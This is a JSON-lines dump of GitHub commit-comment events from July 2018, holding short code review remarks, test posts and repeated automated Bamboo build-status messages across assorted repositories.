{"id":"7994528820","type":"CommitCommentEvent","actor":{"login":"ananyamindcraft"},"repo":{"name":"ananyamindcraft/libgit3"},"payload":{"comment":{"id":29777859,"position":2,"line":2,"path":"test8","commit_id":"b7e487cd5c2c73f9454c49dee5b984e9e14ef609","created_at":"2018-07-20T11:41:35Z","updated_at":"2018-07-20T11:41:35Z","author_association":"OWNER","body":"frggff"}},"created_at":"2018-07-20T11:41:35Z"}
{"id":"7994529237","type":"CommitCommentEvent","actor":{"login":"Nekiono"},"repo":{"name":"Nekiono/marv-docs"},"payload":{"comment":{"id":29777860,"position":null,"line":null,"path":null,"commit_id":"66b28028d10ddd830255d0ac6f26439300e08723","created_at":"2018-07-20T11:41:41Z","updated_at":"2018-07-20T11:41:41Z","author_association":"OWNER","body":"Linking the Spotify page"}},"created_at":"2018-07-20T11:41:41Z"}
{"id":"7994529980","type":"CommitCommentEvent","actor":{"login":"ananyamindcraft"},"repo":{"name":"ananyamindcraft/libgit3"},"payload":{"comment":{"id":29777864,"position":null,"line":null,"path":null,"commit_id":"b7e487cd5c2c73f9454c49dee5b984e9e14ef609","created_at":"2018-07-20T11:41:52Z","updated_at":"2018-07-20T11:41:52Z","author_association":"OWNER","body":"test index"}},"created_at":"2018-07-20T11:41:52Z"}
{"id":"7994536812","type":"CommitCommentEvent","actor":{"login":"Vigneshlakshminarayanan"},"repo":{"name":"KittyCookie/react-native-chartjs"},"payload":{"comment":{"id":29777879,"position":null,"line":null,"path":null,"commit_id":"2b3e646c355120567aead0d0f72c71cfd1a26567","created_at":"2018-07-20T11:43:31Z","updated_at":"2018-07-20T11:43:31Z","author_association":"NONE","body":"Help"}},"created_at":"2018-07-20T11:43:31Z"}
{"id":"7994540823","type":"CommitCommentEvent","actor":{"login":"karanjthakkar"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29777891,"position":5,"line":447,"path":"React/Views/ScrollView/RCTScrollView.m","commit_id":"f96d7ae6486eb245496c0fef07239ae0480e88b6","created_at":"2018-07-20T11:44:29Z","updated_at":"2018-07-20T11:44:29Z","author_association":"CONTRIBUTOR","body":"@PeteTheHeat Just wanted to let you know an issue that we encountered because of this change. In our brownfield project, we had a `UIView` category (`UIView+Something.h`) which implemented the protocol `UITextViewDelegate` which in turn extends `UIScrollViewDelegate`. Due to this, after upgrading to RN 0.56, our scroll views stopped working coz these lines are missing in the new `else if` block:"}},"created_at":"2018-07-20T11:44:29Z"}
{"id":"7994543418","type":"CommitCommentEvent","actor":{"login":"das-g"},"repo":{"name":"OpenGeoLabs/shapefilemustdie"},"payload":{"comment":{"id":29777903,"position":5,"line":85,"path":"index.html","commit_id":"41101e143ed63e78c4b73d7695cbb22d51acafe4","created_at":"2018-07-20T11:45:07Z","updated_at":"2018-07-20T11:45:07Z","author_association":"NONE","body":":+1: I didn't even notice that typo"}},"created_at":"2018-07-20T11:45:07Z"}
{"id":"7994544784","type":"CommitCommentEvent","actor":{"login":"ThoenigAdrian"},"repo":{"name":"ThoenigAdrian/PingPong"},"payload":{"comment":{"id":29777908,"position":null,"line":null,"path":null,"commit_id":"1ca4b65b996e24fbecd51f9861ae675d7042c766","created_at":"2018-07-20T11:45:26Z","updated_at":"2018-07-20T11:45:26Z","author_association":"OWNER","body":"Looks way better now 😃 \r\n\r\nStresstest Results:\r\n\r\n- 48.8 MB before fixes\r\n- 36.6 MB after fixes \r\n\r\nManaged Memory:\r\n\r\n![image](https://user-images.githubusercontent.com/16619270/43000788-24e514fc-8c23-11e8-9fa7-9d30a9f20f45.png)\r\n"}},"created_at":"2018-07-20T11:45:26Z"}
{"id":"7994547698","type":"CommitCommentEvent","actor":{"login":"lucasfranzolin"},"repo":{"name":"lucasfranzolin/photo-app"},"payload":{"comment":{"id":29777917,"position":null,"line":null,"path":null,"commit_id":"c41919a514e24aa052a2e5c07a58a9c9d9b457c6","created_at":"2018-07-20T11:46:09Z","updated_at":"2018-07-20T11:46:09Z","author_association":"OWNER","body":"~rails generate controller welcome index"}},"created_at":"2018-07-20T11:46:09Z"}
{"id":"7994551448","type":"CommitCommentEvent","actor":{"login":"harshitlamba"},"repo":{"name":"harshitlamba/Genetic-Algorithm---Portfolio-Allocation"},"payload":{"comment":{"id":29777932,"position":null,"line":null,"path":null,"commit_id":"eaeae6424727b24a9f44791dc5209a5b120c5e0f","created_at":"2018-07-20T11:47:03Z","updated_at":"2018-07-20T11:47:03Z","author_association":"OWNER","body":"Stocks' monthly closing price from June 2015 to June 2018"}},"created_at":"2018-07-20T11:47:03Z"}
{"id":"7994554923","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29777940,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-20T11:47:53Z","updated_at":"2018-07-20T11:47:53Z","author_association":"OWNER","body":"OK, I just removed `with-no-warnings` wrapper and got this warning (using `auto-compile-mode`):\r\n\r\n    counsel.el:477:22:Warning: `find-tag-marker-ring' is an obsolete variable (as\r\n        of 25.1); use `xref-push-marker-stack' or `xref-pop-marker-stack' instead.\r\n"}},"created_at":"2018-07-20T11:47:53Z"}
{"id":"7994557398","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29777952,"position":null,"line":null,"path":null,"commit_id":"e4452a41e11f44e61cc981d896c8791a03260f22","created_at":"2018-07-20T11:48:29Z","updated_at":"2018-07-20T11:48:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [028 - Implementar classe GeraRota](https://trello.com/c/IzW5RF2w/36-028-implementar-classe-gerarota)"}},"created_at":"2018-07-20T11:48:29Z"}
{"id":"7994558820","type":"CommitCommentEvent","actor":{"login":"Vigneshlakshminarayanan"},"repo":{"name":"KittyCookie/react-native-chartjs"},"payload":{"comment":{"id":29777955,"position":null,"line":null,"path":null,"commit_id":"2b3e646c355120567aead0d0f72c71cfd1a26567","created_at":"2018-07-20T11:48:48Z","updated_at":"2018-07-20T11:48:48Z","author_association":"NONE","body":"@KittyCookie Found the root cause. Looks like, we cannot use libraries that depends on DOM directly in react native. But can only use charting libraries inside `WebView`. \r\n\r\nThanks 👍 "}},"created_at":"2018-07-20T11:48:48Z"}
{"id":"7994572575","type":"CommitCommentEvent","actor":{"login":"xdd1996"},"repo":{"name":"PlatopiaCore/platopia"},"payload":{"comment":{"id":29778000,"position":null,"line":null,"path":null,"commit_id":"563c616db768f813aa4482d39d8ed1d8aacaad4f","created_at":"2018-07-20T11:52:06Z","updated_at":"2018-07-20T11:52:06Z","author_association":"NONE","body":"Do not give up"}},"created_at":"2018-07-20T11:52:06Z"}
{"id":"7994573720","type":"CommitCommentEvent","actor":{"login":"LuqmanGhazi"},"repo":{"name":"basic-php/task1"},"payload":{"comment":{"id":29778004,"position":null,"line":null,"path":null,"commit_id":"ca7974dd2dfb38b92cc5521be360be9b9914bd56","created_at":"2018-07-20T11:52:22Z","updated_at":"2018-07-20T11:52:22Z","author_association":"COLLABORATOR","body":"Task 1 Finished"}},"created_at":"2018-07-20T11:52:22Z"}
{"id":"7994575867","type":"CommitCommentEvent","actor":{"login":"EricZimmerman"},"repo":{"name":"Genbox/Registry"},"payload":{"comment":{"id":29778013,"position":null,"line":null,"path":null,"commit_id":"591d2ada564926585d255a9799f0c375f587cacd","created_at":"2018-07-20T11:52:54Z","updated_at":"2018-07-20T11:52:54Z","author_association":"NONE","body":"this breaks the way regedit (and microsoft) treat empty values."}},"created_at":"2018-07-20T11:52:54Z"}
{"id":"7994581957","type":"CommitCommentEvent","actor":{"login":"sofiane-mokhtari"},"repo":{"name":"Taikos/RT-Team"},"payload":{"comment":{"id":29778030,"position":null,"line":null,"path":null,"commit_id":"fd61d923b95fb496637255e6276486247ee04e05","created_at":"2018-07-20T11:54:23Z","updated_at":"2018-07-20T11:54:23Z","author_association":"COLLABORATOR","body":"juste j'ai pas changé include et oublié de mettre le .h avec le typedef de t_vect je le change des que je retourne a l’école. "}},"created_at":"2018-07-20T11:54:23Z"}
{"id":"7994585317","type":"CommitCommentEvent","actor":{"login":"omprakashs855"},"repo":{"name":"omprakashs855/start-here-guidelines"},"payload":{"comment":{"id":29778042,"position":null,"line":null,"path":null,"commit_id":"f3f151068159c8f713b1156f8411d1adf5bc2b89","created_at":"2018-07-20T11:55:13Z","updated_at":"2018-07-20T11:55:13Z","author_association":"OWNER","body":"Add omprakashs855"}},"created_at":"2018-07-20T11:55:13Z"}
{"id":"7994585952","type":"CommitCommentEvent","actor":{"login":"Kaperskyguru"},"repo":{"name":"zico404/student-s-lodge-finder"},"payload":{"comment":{"id":29778046,"position":null,"line":null,"path":null,"commit_id":"cf5cff586f3f6146e387a8e74c2eb0e72380484f","created_at":"2018-07-20T11:55:22Z","updated_at":"2018-07-20T11:55:22Z","author_association":"COLLABORATOR","body":"Seen.... Looking great..."}},"created_at":"2018-07-20T11:55:22Z"}
{"id":"7994592884","type":"CommitCommentEvent","actor":{"login":"jsdosa"},"repo":{"name":"Samsung/TizenRT"},"payload":{"comment":{"id":29778075,"position":43,"line":43,"path":"framework/src/eventloop/eventloop_timer.c","commit_id":"89fa834c66c58b6c1fbf70c0ff92b4d654c1155d","created_at":"2018-07-20T11:57:05Z","updated_at":"2018-07-20T11:57:05Z","author_association":"CONTRIBUTOR","body":"return type is void\r\n"}},"created_at":"2018-07-20T11:57:05Z"}
{"id":"7994598390","type":"CommitCommentEvent","actor":{"login":"jsdosa"},"repo":{"name":"Samsung/TizenRT"},"payload":{"comment":{"id":29778092,"position":60,"line":60,"path":"framework/src/eventloop/eventloop_timer.c","commit_id":"89fa834c66c58b6c1fbf70c0ff92b4d654c1155d","created_at":"2018-07-20T11:58:24Z","updated_at":"2018-07-20T11:58:24Z","author_association":"CONTRIBUTOR","body":"the handle value also needs a null check."}},"created_at":"2018-07-20T11:58:24Z"}
{"id":"7994599764","type":"CommitCommentEvent","actor":{"login":"diizzyy"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29778097,"position":null,"line":null,"path":null,"commit_id":"7c306ae640feb4d42b352175de27b034bd917938","created_at":"2018-07-20T11:58:45Z","updated_at":"2018-07-20T11:58:45Z","author_association":"CONTRIBUTOR","body":"Isn't that a bug?"}},"created_at":"2018-07-20T11:58:45Z"}
{"id":"7994602171","type":"CommitCommentEvent","actor":{"login":"jsdosa"},"repo":{"name":"Samsung/TizenRT"},"payload":{"comment":{"id":29778107,"position":60,"line":60,"path":"framework/src/eventloop/eventloop_timer.c","commit_id":"89fa834c66c58b6c1fbf70c0ff92b4d654c1155d","created_at":"2018-07-20T11:59:22Z","updated_at":"2018-07-20T11:59:22Z","author_association":"CONTRIBUTOR","body":"the handle value also needs a null check."}},"created_at":"2018-07-20T11:59:22Z"}
{"id":"7994611590","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29778139,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-20T12:01:35Z","updated_at":"2018-07-20T12:01:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T12:01:35Z"}
{"id":"7994611955","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29778142,"position":5,"line":109,"path":"app/src/main/java/fuck/it/attack/graphics/Shader.java","commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T12:01:41Z","updated_at":"2018-07-20T12:01:41Z","author_association":"NONE","body":"Just revert this change and remove the call to `buffer.flip();`. As is stated very clearly in [JOML's JavaDocs for Matrix4f.get(FloatBuffer)](https://joml-ci.github.io/JOML/apidocs/org/joml/Matrix4f.html#get-java.nio.FloatBuffer-), that method will not advance the Buffer's position, so that people won't need to call Buffer.flip()/rewind().\r\nAlso read the examples in the README.md: https://github.com/JOML-CI/JOML#using-with-lwjgl"}},"created_at":"2018-07-20T12:01:41Z"}
{"id":"7994618479","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29778158,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-20T12:03:16Z","updated_at":"2018-07-20T12:03:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T12:03:16Z"}
{"id":"7994619142","type":"CommitCommentEvent","actor":{"login":"cdecker"},"repo":{"name":"rustyrussell/lightning"},"payload":{"comment":{"id":29778161,"position":null,"line":null,"path":null,"commit_id":"940f3637b52049b1bb530a2f84a7ee7bfe08d3f7","created_at":"2018-07-20T12:03:26Z","updated_at":"2018-07-20T12:03:26Z","author_association":"COLLABORATOR","body":"Damn, I actually had this (and some more `assert`s) in my branch, but couldn't reproduce the error..."}},"created_at":"2018-07-20T12:03:26Z"}
{"id":"7994619244","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29778162,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-20T12:03:28Z","updated_at":"2018-07-20T12:03:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T12:03:28Z"}
{"id":"7994620222","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29778165,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-20T12:03:42Z","updated_at":"2018-07-20T12:03:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T12:03:42Z"}
{"id":"7994620628","type":"CommitCommentEvent","actor":{"login":"cnuke"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29778166,"position":null,"line":null,"path":null,"commit_id":"05f8b0348746b342cf81f7d6523987d06e7b0546","created_at":"2018-07-20T12:03:49Z","updated_at":"2018-07-20T12:03:49Z","author_association":"NONE","body":"@alex-ab done.\r\n"}},"created_at":"2018-07-20T12:03:49Z"}
{"id":"7994621026","type":"CommitCommentEvent","actor":{"login":"cnuke"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29778167,"position":null,"line":null,"path":null,"commit_id":"4342ab318ff2b053b7caf3131f1f29ef7bf97e91","created_at":"2018-07-20T12:03:56Z","updated_at":"2018-07-20T12:03:56Z","author_association":"NONE","body":"@alex-ab done."}},"created_at":"2018-07-20T12:03:56Z"}
{"id":"7994622403","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29778173,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-20T12:04:13Z","updated_at":"2018-07-20T12:04:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T12:04:13Z"}
{"id":"7994622600","type":"CommitCommentEvent","actor":{"login":"jow-"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29778175,"position":null,"line":null,"path":null,"commit_id":"7c306ae640feb4d42b352175de27b034bd917938","created_at":"2018-07-20T12:04:16Z","updated_at":"2018-07-20T12:04:16Z","author_association":"CONTRIBUTOR","body":"Not nescessarily."}},"created_at":"2018-07-20T12:04:16Z"}
{"id":"7994629753","type":"CommitCommentEvent","actor":{"login":"Dimmerworld"},"repo":{"name":"jasonrohrer/OneLife"},"payload":{"comment":{"id":29778189,"position":null,"line":null,"path":null,"commit_id":"ed66b71cba46391d1cba3207809ac86bd18c26fe","created_at":"2018-07-20T12:05:58Z","updated_at":"2018-07-20T12:05:58Z","author_association":"NONE","body":":("}},"created_at":"2018-07-20T12:05:58Z"}
{"id":"7994630850","type":"CommitCommentEvent","actor":{"login":"EricZimmerman"},"repo":{"name":"Genbox/Registry"},"payload":{"comment":{"id":29778195,"position":null,"line":null,"path":null,"commit_id":"5755f10af296fbf30d00f203822fd99866d44faa","created_at":"2018-07-20T12:06:13Z","updated_at":"2018-07-20T12:06:13Z","author_association":"NONE","body":"is this a noticeable improvement in speed with this change?"}},"created_at":"2018-07-20T12:06:13Z"}
{"id":"7994631207","type":"CommitCommentEvent","actor":{"login":"sebast5"},"repo":{"name":"sebast5/hello-world"},"payload":{"comment":{"id":29778197,"position":5,"line":425,"path":"style.css","commit_id":"aa060de4b5663c3a08a490872304472550c08713","created_at":"2018-07-20T12:06:19Z","updated_at":"2018-07-20T12:06:19Z","author_association":"OWNER","body":"Good change"}},"created_at":"2018-07-20T12:06:19Z"}
{"id":"7994631822","type":"CommitCommentEvent","actor":{"login":"sebast5"},"repo":{"name":"sebast5/hello-world"},"payload":{"comment":{"id":29778202,"position":5,"line":425,"path":"style.css","commit_id":"aa060de4b5663c3a08a490872304472550c08713","created_at":"2018-07-20T12:06:28Z","updated_at":"2018-07-20T12:06:28Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-20T12:06:28Z"}
{"id":"7994633148","type":"CommitCommentEvent","actor":{"login":"sbidoul"},"repo":{"name":"OCA/maintainer-quality-tools"},"payload":{"comment":{"id":29778204,"position":null,"line":null,"path":null,"commit_id":"01d081688c488417631dfdfb9c52a17da04b8cbe","created_at":"2018-07-20T12:06:45Z","updated_at":"2018-07-20T12:06:45Z","author_association":"MEMBER","body":"That should not be necessary. We must not freeze requirements in OCA repos."}},"created_at":"2018-07-20T12:06:45Z"}
{"id":"7994637121","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29778215,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-20T12:07:40Z","updated_at":"2018-07-20T12:07:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T12:07:40Z"}
{"id":"7994637913","type":"CommitCommentEvent","actor":{"login":"bryanasuncion"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29778220,"position":null,"line":null,"path":null,"commit_id":"f11c24fc77e652ef20aedc4153280fb83afd04d8","created_at":"2018-07-20T12:07:52Z","updated_at":"2018-07-20T12:07:52Z","author_association":"NONE","body":"how can i recieve btc"}},"created_at":"2018-07-20T12:07:52Z"}
{"id":"7994647730","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29778247,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-20T12:10:16Z","updated_at":"2018-07-20T12:10:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T12:10:16Z"}
{"id":"7994729070","type":"CommitCommentEvent","actor":{"login":"petroseskinder"},"repo":{"name":"andyfangdz/cassette"},"payload":{"comment":{"id":29778458,"position":8,"line":8,"path":"README.md","commit_id":"c8ea5829d8d4ea79777001a588a404f8aca5ecd6","created_at":"2018-07-20T12:29:28Z","updated_at":"2018-07-20T12:29:28Z","author_association":"NONE","body":"Thanks"}},"created_at":"2018-07-20T12:29:28Z"}
{"id":"7994731664","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29778461,"position":38,"line":366,"path":"puppet/services/glance-api.yaml","commit_id":"f7cc4b6e463570da034e2a1a7922b4d810232bd9","created_at":"2018-07-20T12:30:01Z","updated_at":"2018-07-20T12:30:01Z","author_association":"NONE","body":"I definitely prefer the new names you use on L374..L376 of the original file (the stuff on the left side of this screen). I'm hoping you can rework the original block of code at L372..L378 to incorporate support for Netapp."}},"created_at":"2018-07-20T12:30:01Z"}
{"id":"7994737135","type":"CommitCommentEvent","actor":{"login":"dilrajssokhi"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29778475,"position":18,"line":18,"path":"register_user.js","commit_id":"a40834b37421d80548ce2e5c3692aad786b1f197","created_at":"2018-07-20T12:31:11Z","updated_at":"2018-07-20T12:31:11Z","author_association":"NONE","body":"created_at, updated_at can be picked by SQL as default. Please look into it and define it in the schema itself that way it will be standardized in db throughout the project."}},"created_at":"2018-07-20T12:31:11Z"}
{"id":"7994738080","type":"CommitCommentEvent","actor":{"login":"joewalsh"},"repo":{"name":"wikimedia/wikipedia-ios"},"payload":{"comment":{"id":29778476,"position":26,"line":292,"path":"WMF Framework/ColumnarCollectionViewLayout.swift","commit_id":"a3968677c570c76dd0cc8a27e55d27421d836e3c","created_at":"2018-07-20T12:31:23Z","updated_at":"2018-07-20T12:31:23Z","author_association":"CONTRIBUTOR","body":"probably want to check that `oldInfo.sections.indicies.contains(currentSection)` before accessing it, same for `info.sections`"}},"created_at":"2018-07-20T12:31:23Z"}
{"id":"7994740502","type":"CommitCommentEvent","actor":{"login":"alexpott"},"repo":{"name":"drupal/drupal"},"payload":{"comment":{"id":29778480,"position":null,"line":null,"path":null,"commit_id":"a7fdfb64693d00bd7e094ccda45c3e58581b8bbe","created_at":"2018-07-20T12:31:56Z","updated_at":"2018-07-20T12:31:56Z","author_association":"CONTRIBUTOR","body":"Thank you very much for this report - I've opened https://www.drupal.org/project/drupal/issues/2987114 to track it."}},"created_at":"2018-07-20T12:31:56Z"}
{"id":"7994746277","type":"CommitCommentEvent","actor":{"login":"ashangit"},"repo":{"name":"benallamar/hadoop-common"},"payload":{"comment":{"id":29778493,"position":null,"line":null,"path":null,"commit_id":"2d2bea30bb77d3539b50ee5dff462756235d0c7c","created_at":"2018-07-20T12:33:13Z","updated_at":"2018-07-20T12:33:13Z","author_association":"NONE","body":"LGTM"}},"created_at":"2018-07-20T12:33:13Z"}
{"id":"7994750563","type":"CommitCommentEvent","actor":{"login":"MarcinML"},"repo":{"name":"MarcinML/modern_cpp"},"payload":{"comment":{"id":29778499,"position":1,"line":1,"path":"Makefile","commit_id":"0056c7f16e021d1e74c8f9425edc7c2cca67c2a6","created_at":"2018-07-20T12:34:11Z","updated_at":"2018-07-20T12:34:11Z","author_association":"OWNER","body":"Witaj,\nw załączniku przesyłam potwierdzenie przelewu za drugą ratę opłaty za kurs.\nPozdrawiam serdecznie,\nMarcin Liszcz\n\nW dniu 2 lipca 2018 20:46 użytkownik LordLukin <notifications@github.com>\nnapisał:\n\n> Wiem że w przykładzie było CC i CFLAGS, ale tak się zwyczajowo odnosi to\n> kompilatora języka C. W przypadku C++ używa się CXX i CXXFLAGS.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarcinML/modern_cpp/commit/0056c7f16e021d1e74c8f9425edc7c2cca67c2a6#commitcomment-29570665>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AYhyqRr2JsRXVpQYQ2LrwU7OSADw2WI2ks5uCmp7gaJpZM4U_xbG>\n> .\n>\n"}},"created_at":"2018-07-20T12:34:11Z"}
{"id":"7994752653","type":"CommitCommentEvent","actor":{"login":"Noiwex"},"repo":{"name":"samuelmaddock/gm-mediaplayer"},"payload":{"comment":{"id":29778506,"position":null,"line":null,"path":null,"commit_id":"3ef6f3b83a5c1e18b74faf367dc4fafa528c96c2","created_at":"2018-07-20T12:34:39Z","updated_at":"2018-07-20T12:34:39Z","author_association":"CONTRIBUTOR","body":"so much unnecessary ads"}},"created_at":"2018-07-20T12:34:39Z"}
{"id":"7994752817","type":"CommitCommentEvent","actor":{"login":"dilrajssokhi"},"repo":{"name":"harshita009/login_and_reg"},"payload":{"comment":{"id":29778508,"position":29,"line":24,"path":"login_user.js","commit_id":"9303372c84361da645b3b3dee66173d7ac2072b0","created_at":"2018-07-20T12:34:42Z","updated_at":"2018-07-20T12:34:42Z","author_association":"NONE","body":"You dont need to save the token in the db. It can lead to security issues if someone gets access to your db. "}},"created_at":"2018-07-20T12:34:42Z"}
{"id":"7994752990","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"Dingrongdeer/X-Village-2018-Exercise"},"payload":{"comment":{"id":29778509,"position":null,"line":null,"path":null,"commit_id":"a9553ebad408cf007551a066d2862afe84cd6896","created_at":"2018-07-20T12:34:44Z","updated_at":"2018-07-20T12:34:44Z","author_association":"NONE","body":"讚讚"}},"created_at":"2018-07-20T12:34:44Z"}
